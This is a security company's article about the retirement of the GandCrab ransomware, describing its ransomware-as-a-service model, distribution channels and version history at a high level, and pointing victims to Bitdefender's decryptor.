A recently notorious ransomware, GandCrab has finally been retired by developers after a decryptor has become publicly available. Like most ransomware, this has targeted organisations and individuals indiscriminately. While it has undergone many iterations since its release in ‘the wild’, the primary function has remained the same - Encrypt victims files and exfiltrate sensitive information, offering a key to decrypt these files for an exorbitant fee, payable through Cryptocurrency of indiscernible origin (Dash, in this instance).
GandCrab followed a Ransomware as a Service (RaaS) model, in which it was sold to affiliates who shared 60% of the revenue and could also access victim information which included IP addresses, domain information, operating system details and so on. Over 5 core versions of this malware were distributed via various malware campaigns, spam emails, exploit kits and fake torrenting sites. Each version aimed to answer solutions released to decrypt malware-infected files. This included basic encryption methods in its first iteration, leading to a later version which leveraged a method of DLL/EXE execution (Invoke-ReflectivePEInjection) within the victim’s Powershell process, without writing to disk. Characteristically similar to other ransomware, obfuscated scripts were presented to the victim to be downloaded, which then decoded a URL pointing to the download of GandCrab, unbeknownst to the user.
Since its creation and release, according to GandCrab developers, this ransomware campaign has earned over $2 billion dollars in revenue from roughly 50,000 devices within the last two months. The alleged success of this ransomware can be attributed to the developer’s persistence in meeting mitigating patches with newer, more effective versions of the malware, distributed sometimes within hours upon a fix. This back-and-forth between patching and malware updates finally ceased after GandCrab developers officially halted the malware at version 5.2, boasting a “well-deserved retirement” in response to the release of the Bitdefender’s decryptor.
Alcorn Group has observed this variant of ransomware amongst others through various Incident Response (IR) engagements. Ransomware is exceptionally damaging to individuals and organisations alike, posing a multitude of significant business risks when new strains are identified due to the tenacity attackers take to ensure a ransom is paid.
Ransomware can never be trusted, no matter what lengths criminals will take to convince their victims that their files will remain unencrypted after payment. Even if a ransom is paid, it is likely that sensitive data stored in a compromised system has already been exfiltrated. Newer, more sophisticated and damaging strains of ransomware can surface suddenly, as demonstrated within GandCrab’s lifecycle.
If you, or your organisation, has encountered GandCrab, please refer to Bitdefender’s decryptor. Contact us for more information on how ransomware can affect your organisation, and what to do in the event of malware infection.